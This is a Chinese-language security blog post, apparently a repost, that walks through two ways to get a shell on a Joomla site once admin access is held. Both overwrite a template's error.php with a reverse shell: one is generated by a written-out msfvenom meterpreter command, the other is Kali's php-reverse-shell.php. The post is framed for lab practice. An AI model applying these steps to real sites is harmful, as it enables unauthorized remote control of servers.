Joomla后台模板Getshell技巧

admin 2024年1月4日09:31:25评论120 views字数 855阅读2分51秒阅读模式

文章前言

本篇文章我们主要介绍在获取到Joomla后台管理权限的情况下如何通过后台来实现Getshell的两种利用方式

GetShell

Metasploit

首先我们使用site_admin/123456登录Joomla后台

Joomla后台模板Getshell技巧

Joomla后台模板Getshell技巧

在获取到Joomla的后台操作权限后我们可以通过在后台修改主题文件的方式来获取shell权限,这里我们随意选择一个主题

Joomla后台模板Getshell技巧

选择查看模板文件的详细信息

Joomla后台模板Getshell技巧

选择error.php文件

Joomla后台模板Getshell技巧

然后使用msfvenom来生成要给php后门文件

#PHP后门文件msfvenom -p php/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php

Joomla后台模板Getshell技巧

然后使用我们之前在msfvenom中生成的webshell文件内容替换上面error.php文件内容

Joomla后台模板Getshell技巧

保存后访问Beez3主题下的error.php文件便可成功的突破边界

http://192.168.204.137/joomla/templates/beez3/error.php

Joomla后台模板Getshell技巧

随后在我们的MSF中获取到一个会话

Joomla后台模板Getshell技巧

GetShell-2

这里我们介绍另外一种GetShell的方法,此方法和上面的方法类似,只是用的脚本不同,我们主要通过利用Kali自带的php-reverse-shell.php来实现反弹shell的目的,文件路径为/usr/share/webshells/php/php-reverse-shell.php

Joomla后台模板Getshell技巧

随后我们直接修改模板文件的内容为上面的php-reverse-shell.php,同时修改文件中的反弹shell的地址和端口信息

Joomla后台模板Getshell技巧

随后开启监听

Joomla后台模板Getshell技巧

在WEB端访问上述的error.php文件

Joomla后台模板Getshell技巧

随后反弹shell回来

Joomla后台模板Getshell技巧

文末小结

此文仅作为Joomla后台GetShell的利用思路介绍,日常打靶机的时候Joomla遇到的可能多一些,正常的红队评估测试中外网少之又少,很少见到~

原文始发于微信公众号(七芒星实验室):Joomla后台模板Getshell技巧

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月4日09:31:25
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Joomla后台模板Getshell技巧https://cn-sec.com/archives/2362026.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息